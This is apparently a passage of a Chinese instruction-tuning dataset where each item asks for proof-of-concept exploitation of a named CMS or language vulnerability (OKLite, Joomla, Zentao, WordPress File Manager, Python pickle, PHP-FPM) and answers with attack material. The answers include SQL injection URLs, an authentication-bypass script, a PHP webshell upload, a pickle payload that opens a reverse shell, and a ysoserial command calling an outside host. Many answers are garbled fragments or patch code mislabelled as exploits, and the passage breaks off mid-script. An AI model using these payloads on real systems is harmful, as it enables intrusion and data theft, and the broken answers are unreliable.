  111. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OKLite 1.2.25 后台风格模块 任意文件删除 CVE-2019-16132\n漏洞描述:OKLite 1.2.25 后台风格模块存在 对危险字符未过滤,导致可以删除任意目录和文件\n影响版本:``` OKLite 1.2.25 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2019-16132\n【POC利用方法】\n1. OKLite 1.2.25\n2. /**\n\t * 删除操作,请一定要小心,在程序中最好严格一些,不然有可能将整个目录删掉\n\t * @参数 $del 要删除的文件或文件夹\n\t * @参数 $type 仅支持file和folder,为file时仅删除$del文件,如果$del为文件夹,表示删除其下面的文件。为folder时,表示删除$del这个文件,如果为文件夹,表示删除此文件夹及子项\n\t * @返回 true/false\n\t**/\n\tpublic function rm($del,$type=\"file\")\n\t{\n\t\tif(!file_exists($del)){\n\t\t\treturn false;\n\t\t}\n\t\tif(is_file($del)){\n\t\t\tunlink($del);\n\t\t\treturn true;\n\t\t}\n\t\t$array = $this->_dir_list($del);\n\t\tif(!$array){\n\t\t\tif($type == 'folder'){\n\t\t\t\trmdir($del);\n\t\t\t}\n\t\t\treturn true;\n\t\t}\n\t\tforeach($array as $key=>$value){\n\t\t\tif(file_exists($value)){\n\t\t\t\tif(is_dir($value)){\n\t\t\t\t\t$this->rm($value,$type);\n\t\t\t\t}else{\n\t\t\t\t\tunlink($value);\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t\tif($type == \"folder\"){\n\t\t\trmdir($del);\n\t\t}\n\t\treturn true;\n\t}\n3. 回过头看 调用get函数传入参数时是否有对 **../** 的过滤\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OKLite 1.2.25 后台风格模块 任意文件删除 CVE-2019-16132.md"}
    112. 

  112. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OKLite 1.2.25 后台插件安装 任意文件上传\n漏洞描述:OKLite v1.2.25 后台插件过滤不完善导致可以上传恶意木马文件\n影响版本:``` OKLite 1.2.25 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. OKLite 1.2.25\n2. public function unzip_f()\n\t{\n\t\t$id = $this->get('id','int');\n\t\t$rs = $this->model('res')->get_one($id);\n\t\tif(!$rs){\n\t\t\t$this->json(P_Lang('附件不存在'));\n\t\t}\n\t\tif($rs['ext'] != 'zip'){\n\t\t\t$this->json(P_Lang('非ZIP文件不支持在线解压'));\n\t\t}\n\t\tif(!file_exists($this->dir_root.$rs['filename'])){\n\t\t\t$this->json(P_Lang('文件不存在'));\n\t\t}\n\t\t$info = $this->lib('phpzip')->zip_info($this->dir_root.$rs['filename']);\n\t\t$info = current($info);\n\t\tif(!$info['filename']){\n\t\t\t$this->json(P_Lang('插件有异常'));\n\t\t}\n\t\t$info = explode('/',$info['filename']);\n\t\tif(!$info[0]){\n\t\t\t$this->json(P_Lang('插件有异常'));\n\t\t}\n\t\tif(file_exists($this->dir_root.'plugins/'.$info[0])){\n\t\t\t$this->json(P_Lang('插件已存在,不允许重复解压'));\n\t\t}\n\t\tif(!$info[1]){\n\t\t\t$this->json(P_Lang('插件打包模式有问题'));\n\t\t}\n\t\t$this->lib('phpzip')->unzip($this->dir_root.$rs['filename'],$this->dir_root.'plugins/');\n\t\t$this->json(true);\n\t}\n3. $info = explode('/',$info['filename']);\n\t\tif(!$info[0]){\n\t\t\t$this->json(P_Lang('插件有异常'));\n\t\t}\n\t\tif(file_exists($this->dir_root.'plugins/'.$info[0])){\n\t\t\t$this->json(P_Lang('插件已存在,不允许重复解压'));\n\t\t}\n\t\tif(!$info[1]){\n\t\t\t$this->json(P_Lang('插件打包模式有问题'));\n\t\t}\n\t\t$this->lib('phpzip')->unzip($this->dir_root.$rs['filename'],$this->dir_root.'plugins/');\n\t\t$this->json(true);\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/OKLite 1.2.25 后台插件安装 任意文件上传.md"}
    113. 

  113. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917\n漏洞描述:Joomla是一套世界第二流行的内容管理系统。它使用的是PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行,目前由开放源码组织Open Source Matters进行开发与支持。 Joomla 3.7版本后引入一个新的组件 “com_fields”,这一组件会引发易被利用的漏洞,并且不需要受害者网站上的高权限,这意味着任何人都可以通过对站点恶意访问利用这个漏洞。\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2017-8917\n【POC利用方法】\n1. docker-compose up -d\n2. http://your-ip:8080/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)\n3. 启动后访问`http://your-ip:8080`即可看到Joomla的安装界面,当前环境的数据库信息为:\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Joomla 3.7.0 SQL注入漏洞 CVE-2017-8917).md"}
    114. 

  114. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Liferay Portal CE 反序列化命令执行漏洞 CVE-2020-7961\n漏洞描述:Liferay Portal CE是一款用来快速构建网站的开源系统。其7.2.0 GA1及以前的版本API接口中存在一处反序列化漏洞,利用该漏洞可在目标服务器上执行任意命令。 参考链接: - https://codewhitesec.blogspot.com/2020/03/liferay-portal-json-vulns.html - [https://jianfensec.com/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/Liferay%20Portal%20CVE-2020-7961%20%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/](https://jianfensec.com/漏洞复现/Liferay Portal CVE-2020-7961 学习记录/) - https://xz.aliyun.com/t/7499 - https://xz.aliyun.com/t/7485\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2020-7961\n【POC利用方法】\n1. docker-compose up -d\n2. // javac LifExp.java\npublic class LifExp {\n\nstatic {\n    try {\n            String[] cmd = {\"bash\", \"-c\", \"touch /tmp/success\"};\n            java.lang.Runtime.getRuntime().exec(cmd).waitFor();\n        } catch ( Exception e ) {\n            e.printStackTrace();\n        }\n    }\n}\n3. $ ls\nLifExp.class  LifExp.java\n\n$ python3 -m http.server\nServing HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Liferay Portal CE 反序列化命令执行漏洞 CVE-2020-7961.md"}
    115. 

  115. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ke361 MenuController.class.php 后台SQL注入漏洞 CNVD-2021-25002\n漏洞描述:Ke361 MenuController.class.php文件 index() 函数中的pid参数存在 SQL注入漏,导致攻击者通过漏洞可以获取数据库敏感信息\n影响版本:``` Ke361 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. SELECT `id`,`title`,`pid`,`sort`,`url`,`hide`,`tip`,`group`,`is_dev`,`status` FROM `ke_menu` WHERE (id=1)\n2. /admin.php?s=/Menu/index/pid/1)%20AND%20updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--+\n3. Get 传参 pid 传入SQL语句\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/Ke361 MenuController.class.php 后台SQL注入漏洞 CNVD-2021-25002.md"}
    116. 

  116. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:禅道 项目管理系统远程命令执行漏洞 CNVD-2023-02709\n漏洞描述:禅道项目管理系统存在远程命令执行漏洞,该漏洞源于在认证过程中未正确退出程序,导致了认证绕过,并且后台中有多种执行命令的方式,攻击者可利用该漏洞在目标服务器上注入任意命令,实现未授权接管服务器。\n影响版本:``` 杭州易软共创网络科技有限公司 禅道项目管理系统 >=17.4,<=18.0.beta1(开源版) 杭州易软共创网络科技有限公司 禅道项目管理系统 >=7.4,<=8.0.beta1(企业版) 杭州易软共创网络科技有限公司 禅道项目管理系统 >=3.4,<=4.0.beta1(旗舰版) ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 杭州易软共创网络科技有限公司 禅道项目管理系统 >=17.4,<=18.0.beta1(开源版)\n杭州易软共创网络科技有限公司 禅道项目管理系统 >=7.4,<=8.0.beta1(企业版)\n杭州易软共创网络科技有限公司 禅道项目管理系统 >=3.4,<=4.0.beta1(旗舰版)\n2. import requests\n\nheader={\n    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5408.146 Safari/537.36',\n}\n\ndef bypasscookie(url,session):\n    target=url+\"/index.php?m=misc&f=captcha&sessionVar=user\"\n    r=session.get(target,headers=header)\n    zentaosid=r.cookies.get_dict()['zentaosid']\n    print(zentaosid)\n\n    header[\"Cookie\"]=\"zentaosid=\"+zentaosid\n    resp=session.get(url+\"/index.php?m=my&f=index\",headers=header)\n    if \"/shandao/www/index.php?m=user&f=login\" not in resp.text:\n        print(\"绕过登陆验证\")\n    else:\n        print(\"无法绕过验证\")\n\n\n\nif __name__ == '__main__':\n    url=\"http://127.0.0.1:8081/shandao/www/\"\n    session=requests.Session()\n    bypasscookie(url,session)\n3. POST /shandao/www/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss HTTP/1.1\nHost: 127.0.0.1:8081\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/109.0\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nReferer: http://127.0.0.1:8081/shandao/www/index.php?m=repo&f=create&objectID=0&tid=rmqcl0ss\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 144\nOrigin: http://127.0.0.1:8081\nConnection: close\nCookie: lang=zh-cn; device=desktop; theme=default; tab=devops; preCaseLibID=1; lastCaseLib=1; checkedItem=; goback=%7B%22devops%22%3A%22http%3A%5C%2F%5C%2F127.0.0.1%3A8081%5C%2Fshandao%5C%2Fwww%5C%2Findex.php%3Fm%3Drepo%26f%3Dbrowse%26repoID%3D1%26branchID%3D%26objectID%3D0%26tid%3Dvwy3ton6%22%7D; zentaosid=r3094u5448167shtdrur4c7b6q; repoBranch=master; windowWidth=1453; windowHeight=844\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n\nproduct%5B%5D=1&SCM=Gitlab&serviceProject=wangnima&name=wangnima2333&path=&encoding=utf-8&client=&account=&password=&encrypt=base64&desc=&uid=63e4a18218a68\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/禅道 项目管理系统远程命令执行漏洞 CNVD-2023-02709.md"}
    117. 

  117. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325\n漏洞描述:百度云安全团队监测到禅道官方发布了文件上传漏洞的风险通告,该漏洞编号为CNVD-C-2020-121325,漏洞影响禅道<=12.4.2版本。登陆管理后台的恶意攻击者可以通过fopen/fread/fwrite方法读取或上传任意文件,成功利用此漏洞可以读取目标系统敏感文件或获得系统管理权限。我们对漏洞进行了复现和分析,由于需要登录后台才可以利用,实际风险相对较低,建议受影响的禅道用户尽快升级到最新版。\n影响版本:``` 禅道 <= 12.4.2版本 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 禅道 <= 12.4.2版本\n2. http://xxx.xxx.xxx.xxx/www/index.php?mode=getconfig\n3. public function downloadZipPackage($version, $link)\n{\n    $decodeLink = helper::safe64Decode($link);\n    if(preg_match('/^https?\\:\\/\\//', $decodeLink)) return false;\n\n    return parent::downloadZipPackage($version, $link);\n}\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325.md"}
    118. 

  118. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:禅道 12.4.2 CSRF漏洞 CNVD-2020-68552\n漏洞描述:可以针对禅道的部分模块制造恶意URL地址发送给管理员,当管理员登录时会执行模块的恶意请求,可用于进行钓鱼请求\n影响版本:``` 禅道 <= 12.4.2版本 ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. 禅道 <= 12.4.2版本\n2. http://xxx.xxx.xxx.xxx/www/index.php?mode=getconfig\n3. public function checkPriv()\n{\n    $module = $this->app->getModuleName();\n    $method = $this->app->getMethodName();\n    if($this->app->isFlow)\n    {\n        $module = $this->app->rawModule;\n        $method = $this->app->rawMethod;\n    }\n\n    if(!empty($this->app->user->modifyPassword) and (($module != 'my' or $method != 'changepassword') and ($module != 'user' or $method != 'logout'))) die(js::locate(helper::createLink('my', 'changepassword')));\n    if($this->isOpenMethod($module, $method)) return true;\n    if(!$this->loadModel('user')->isLogon() and $this->server->php_auth_user) $this->user->identifyByPhpAuth();\n    if(!$this->loadModel('user')->isLogon() and $this->cookie->za) $this->user->identifyByCookie();\n\n    if(isset($this->app->user))\n    {\n        if(!defined('IN_UPGRADE')) $this->session->user->view = $this->loadModel('user')->grantUserView();\n        $this->app->user = $this->session->user;\n\n        if(!commonModel::hasPriv($module, $method)) $this->deny($module, $method);\n    }\n    else\n    {\n        $referer  = helper::safe64Encode($this->app->getURI(true));\n        die(js::locate(helper::createLink('user', 'login', \"referer=$referer\")));\n    }\n}\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/禅道 12.4.2 CSRF漏洞 CNVD-2020-68552.md"}
    119. 

  119. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress File Manager<6.9 RCE CVE-2020-25213\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【CVE编号】CVE-2020-25213\n【POC利用方法】\n1. curl -ks --max-time 5 -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\"  -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\n2. POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1\nContent-Length: 631\nContent-Type: multipart/form-data; boundary=------------------------9689147a5989a801\nConnection: close\n\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"reqid\"\n\n17457a1fe6959\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"cmd\"\n\nupload\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"target\"\n\nl1_Lw\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"mtime[]\"\n\n1576045135\n--------------------------9689147a5989a801\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"1.php\"\nContent-Type: application/octet-stream\n\n<?php phpinfo();?>\n\n--------------------------9689147a5989a801--\n3. Content-Disposition: form-data; name=\"target\"\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/WordPress File Manager<6.9 RCE CVE-2020-25213.md"}
    120. 

  120. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:狮子鱼CMS image_upload.php 任意文件上传\n漏洞描述:狮子鱼CMS使用CK编辑器,存在图片上传的绕过,造成 image_upload.php 任意文件上传\n影响版本:``` 狮子鱼CMS ```\n网络测绘:``` \"/seller.php?s=/Public/login\" ```\n", "input": "", "output": "【漏洞类型】cms_vulnerability\n【POC利用方法】\n1. \"/seller.php?s=/Public/login\"\n2. <?php\n define ( 'IN_BAMBOO', true );\n // 取得根目录\ndefine ( 'ROOT_PATH', '../../../../' );  // back to your root path\n\n$arrType = array (\n\t\t'http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/jpg',\n\t\t'http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif',\n\t\t'http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/png',\n\t\t'http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/bmp',\n\t\t'http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/pjpeg',\n\t\t'http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/jpeg' \n);\n$max_size = 500 * 1024; // 最大文件限制(单位:byte)\n$upfile = ROOT_PATH.'http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/uploads'; // 图片目录路径\nif (!isset($_FILES ['files'])){\n\techo '{\"result\":\"400\",\"msg\":\"未能找到图片,请确认图片是否过大\"}';\n\texit ();\n}\n$file = $_FILES ['files'];\n\nif ($_SERVER ['REQUEST_METHOD'] == 'POST') { // 判断提交方式是否为POST\n\tif (! is_uploaded_file ( $file ['tmp_name'] )) { // 判断上传文件是否存在\n\t\techo '{\"result\":\"400\",\"msg\":\"图片不存在\"}';\n\t\texit ();\n\t}\n\t\n\tif ($file ['size'] > $max_size) { // 判断文件大小是否大于500000字节\n\t\techo '{\"result\":\"400\",\"msg\":\"上传图片太大,最大支持:'.($max_size/1024).'KB\"}';\n\t\texit ();\n\t}\n\tif (! in_array ( $file ['type'], $arrType )) { // 判断图片文件的格式\n\t\techo '{\"result\":\"400\",\"msg\":\"上传图片格式不对\"}';\n\t\texit ();\n\t}\n\tif (! file_exists ( $upfile )) { // 判断存放文件目录是否存在\n\t\tmkdir ( $upfile, 0777, true );\n\t}\n\t$imageSize = getimagesize ( $file ['tmp_name'] );\n\t$img = $imageSize [0] . '*' . $imageSize [1];\n\t$fname = $file ['name'];\n\t$ftype = explode ( '.', $fname );\n\t$time = explode ( \" \", microtime () );\n\t$time = $time [1] . ($time [0] * 1000);\n\t$time2 = explode ( \".\", $time );  \n\t$time = $time2 [0];\n\t$returnName=$time.\".\" .end($ftype);\n\t$picName = $upfile . \"/\" . $returnName ;\n\t\n\tif (! move_uploaded_file ( $file ['tmp_name'], $picName )) {\n\t\techo '{\"result\":\"400\",\"msg\":\"从:'.$file ['tmp_name'].'移动图片到:'.$picName.'出错\"}';\n\t\texit ();\n\t} else {\n\t\techo '{\"result\":\"200\",\"imgurl\":\"http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/uploads/' . $returnName . '\"}';\n\t}\n}\n\n?>\n3. POST /Common/ckeditor/plugins/multiimg/dialogs/image_upload.php HTTP/2\nHost: \nContent-Type: multipart/form-data;boundary=----WebKitFormBoundary8UaANmWAgM4BqBSs\nContent-Length: 208\n\n------WebKitFormBoundary8UaANmWAgM4BqBSs\nContent-Disposition: form-data; name=\"files\"; filename=\"test.php\"\nContent-Type: http://peiqi-wiki-poc.oss-cn-beijing.aliyuncs.com/vuln/gif\n\n<?php @eval($_POST[test]);?>\n------WebKitFormBoundary8UaANmWAgM4BqBSs—\n", "category": "poc_cms_vulnerability", "source": "awesome_poc_dataset", "file_path": "CMS漏洞/狮子鱼CMS image_upload.php 任意文件上传.md"}
    121. 

  121. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP XDebug 远程调试模式导致代码执行\n漏洞描述:XDebug 是 PHP 的一个扩展,用于调试 PHP 代码。如果目标开启了远程调试模式,并设置 `remote_connect_back = 1`: ``` xdebug.remote_connect_back = 1 xdebug.remote_enable = 1 ``` 这个配置下,我们访问 `http://target/index.php?XDEBUG_SESSION_START=phpstorm`,目标服务器的 XDebug 将会连接访问者的 IP(或 `X-Forwarded-For` 头指定的地址)并通过 dbgp 协议与其通信,我们通过 dbgp 中提供的 eval 方法即可在目标服务器上执行任意 PHP 代码。 更多说明可参考: - https://xdebug.org - https://ricterz.me/posts/Xdebug%3A%20A%20Tiny%20Attack%20Surface\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. xdebug.remote_connect_back = 1\nxdebug.remote_enable = 1\n2. docker compose build\ndocker compose up -d\n3. # 要求用python3并安装requests库\npython3 exp.py -t http://127.0.0.1:8080/index.php -c 'shell_exec('id');'\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP XDebug 远程调试模式导致代码执行.md"}
    122. 

  122. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP 8.1.0-dev 开发版本 zerodium 后门漏洞\n漏洞描述:PHP 8.1.0-dev 版本在 2021 年 3 月 28 日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送 User-Agentt 头来执行任意代码。 参考链接: - https://news-web.php.net/php.internals/113838 - https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d - https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a\n影响版本:``` PHP 8.1.0-dev ```\n网络测绘:``` \"PHP/8.1.0-dev\" ```\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. PHP 8.1.0-dev\n2. \"PHP/8.1.0-dev\"\n3. docker compose up -d\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/PHP 8.1.0-dev 开发版本 zerodium 后门漏洞.md"}
    123. 

  123. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Java RMI Registry 反序列化漏洞(jdk8u232_b09)\n漏洞描述:Java Remote Method Invocation 用于在Java中进行远程调用。RMI存在远程bind的功能(虽然大多数情况不允许远程bind),在bind过程中,伪造Registry接收到的序列化数据(实现了Remote接口或动态代理了实现了Remote接口的对象),使Registry在对数据进行反序列化时触发相应的利用链(环境用的是commons-collections:3.2.1). 自jdk8u121起,Registry对反序列化的类做了白名单限制 ```java if (String.class == clazz || java.lang.Number.class.isAssignableFrom(clazz) || Remote.class.isAssignableFrom(clazz) || java.lang.reflect.Proxy.class.isAssignableFrom(clazz) || UnicastRef.class.isAssignableFrom(clazz) || RMIClientSocketFactory.class.isAssignableFrom(clazz) || RMIServerSocketFactory.class.isAssignableFrom(clazz) || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz) || java.rmi.server.UID.class.isAssignableFrom(clazz)) { return ObjectInputFilter.Status.ALLOWED; } else { return ObjectInputFilter.Status.REJECTED; } ``` 我们需要在上面的几个白名单里面找到相应的可利用的类 具体原理见[浅谈RMI Registry反序列化问题](http://blog.0kami.cn/2020/02/06/rmi-registry-security-problem/)\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. if (String.class == clazz\n        || java.lang.Number.class.isAssignableFrom(clazz)\n        || Remote.class.isAssignableFrom(clazz)\n        || java.lang.reflect.Proxy.class.isAssignableFrom(clazz)\n        || UnicastRef.class.isAssignableFrom(clazz)\n        || RMIClientSocketFactory.class.isAssignableFrom(clazz)\n        || RMIServerSocketFactory.class.isAssignableFrom(clazz)\n        || java.rmi.activation.ActivationID.class.isAssignableFrom(clazz)\n        || java.rmi.server.UID.class.isAssignableFrom(clazz)) {\n    return ObjectInputFilter.Status.ALLOWED;\n} else {\n    return ObjectInputFilter.Status.REJECTED;\n}\n2. docker-compose build\ndocker-compose run -e RMIIP=your-ip -p 1099:1099 rmi\n3. // 开启JRMPListener\njava -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8888 CommonsCollections6 \"curl http://xxxxx.burpcollaborator.net\"\n// 发起攻击\njava -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit2 192.168.31.88 1099 jrmphost 8888\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/Java RMI Registry 反序列化漏洞(jdk8u232_b09).md"}
    124. 

  124. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Python pip install RCE 漏洞 CVE-2013-1629\n漏洞描述:当通过 HTTP 从 Pypi 存储库检索包时,不会检查包内容的完整性。利用这个缺陷,攻击者可以通过 `pip install` 来执行代码。 参考阅读: - https://github.com/0x00-0x00/FakePip - https://www.sourceclear.com/vulnerability-database/security/remote-code-execution-rce-using-pip/python/sid-2098\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【CVE编号】CVE-2013-1629\n【POC利用方法】\n1. $ wget http://your-vps-ip/setup.py\n2. $ mkdir fakepip\n$ mv setup.py fakepip/\n$ cd fakepip\n# sudo /usr/bin/pip install . --upgrade --force-reinstall\n3. $ copy /b test.png + pic.zip pic.png\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/Python pip install RCE 漏洞 CVE-2013-1629.md"}
    125. 

  125. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Python unpickle 造成任意命令执行漏洞\n漏洞描述:参考阅读: - http://rickgray.me/2015/09/12/django-command-execution-analysis.html - https://www.leavesongs.com/PENETRATION/zhangyue-python-web-code-execute.html\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. #!/usr/bin/env python3\nimport requests\nimport pickle\nimport os\nimport base64\n\n\nclass exp(object):\n    def __reduce__(self):\n        s = \"\"\"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.174.128\",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);'\"\"\"\n        return (os.system, (s,))\n\n\ne = exp()\ns = pickle.dumps(e)\n\nresponse = requests.get(\"http://192.168.174.128:8000/\", cookies=dict(\n    user=base64.b64encode(s).decode()\n))\nprint(response.content)\n3. - http://rickgray.me/2015/09/12/django-command-execution-analysis.html\n", "category": "poc_language_vulnerability", "source": "awesome_poc_dataset", "file_path": "开发语言漏洞/Python unpickle 造成任意命令执行漏洞.md"}
    126. 

  126. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:PHP-FPM Fastcgi 未授权访问漏洞\n漏洞描述:参考阅读: - https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html\n", "input": "", "output": "【漏洞类型】language_vulnerability\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. import socket\nimport random\nimport argparse\nimport sys\nfrom io import BytesIO\n\n# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client\n\nPY2 = True if sys.version_info.major == 2 else False\n\n\ndef bchr(i):\n    if PY2:\n        return force_bytes(chr(i))\n    else:\n        return bytes([i])\n\ndef bord(c):\n    if isinstance(c, int):\n        return c\n    else:\n        return ord(c)\n\ndef force_bytes(s):\n    if isinstance(s, bytes):\n        return s\n    else:\n        return s.encode('utf-8', 'strict')\n\ndef force_text(s):\n    if issubclass(type(s), str):\n        return s\n    if isinstance(s, bytes):\n        s = str(s, 'utf-8', 'strict')\n    else:\n        s = str(s)\n    return s\n\n\nclass FastCGIClient:\n    \"\"\"A Fast-CGI Client for Python\"\"\"\n\n    # private\n    __FCGI_VERSION = 1\n\n    __FCGI_ROLE_RESPONDER = 1\n    __FCGI_ROLE_AUTHORIZER = 2\n    __FCGI_ROLE_FILTER = 3\n\n    __FCGI_TYPE_BEGIN = 1\n    __FCGI_TYPE_ABORT = 2\n    __FCGI_TYPE_END = 3\n    __FCGI_TYPE_PARAMS = 4\n    __FCGI_TYPE_STDIN = 5\n    __FCGI_TYPE_STDOUT = 6\n    __FCGI_TYPE_STDERR = 7\n    __FCGI_TYPE_DATA = 8\n    __FCGI_TYPE_GETVALUES = 9\n    __FCGI_TYPE_GETVALUES_RESULT = 10\n    __FCGI_TYPE_UNKOWNTYPE = 11\n\n    __FCGI_HEADER_SIZE = 8\n\n    # request state\n    FCGI_STATE_SEND = 1\n    FCGI_STATE_ERROR = 2\n    FCGI_STATE_SUCCESS = 3\n\n    def __init__(self, host, port, timeout, keepalive):\n        self.host = host\n        self.port = port\n        self.timeout = timeout\n        if keepalive:\n            self.keepalive = 1\n        else:\n            self.keepalive = 0\n        self.sock = None\n        self.requests = dict()\n\n    def __connect(self):\n        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        self.sock.settimeout(self.timeout)\n        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n        # if self.keepalive:\n        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 1)\n        # else:\n        #     self.sock.setsockopt(socket.SOL_SOCKET, socket.SOL_KEEPALIVE, 0)\n        try:\n            self.sock.connect((self.host, int(self.port)))\n        except socket.error as msg:\n            self.sock.close()\n            self.sock = None\n            print(repr(msg))\n            return False\n        return True\n\n    def __encodeFastCGIRecord(self, fcgi_type, content, requestid):\n        length = len(content)\n        buf = bchr(FastCGIClient.__FCGI_VERSION) \\\n               + bchr(fcgi_type) \\\n               + bchr((requestid >> 8) & 0xFF) \\\n               + bchr(requestid & 0xFF) \\\n               + bchr((length >> 8) & 0xFF) \\\n               + bchr(length & 0xFF) \\\n               + bchr(0) \\\n               + bchr(0) \\\n               + content\n        return buf\n\n    def __encodeNameValueParams(self, name, value):\n        nLen = len(name)\n        vLen = len(value)\n        record = b''\n        if 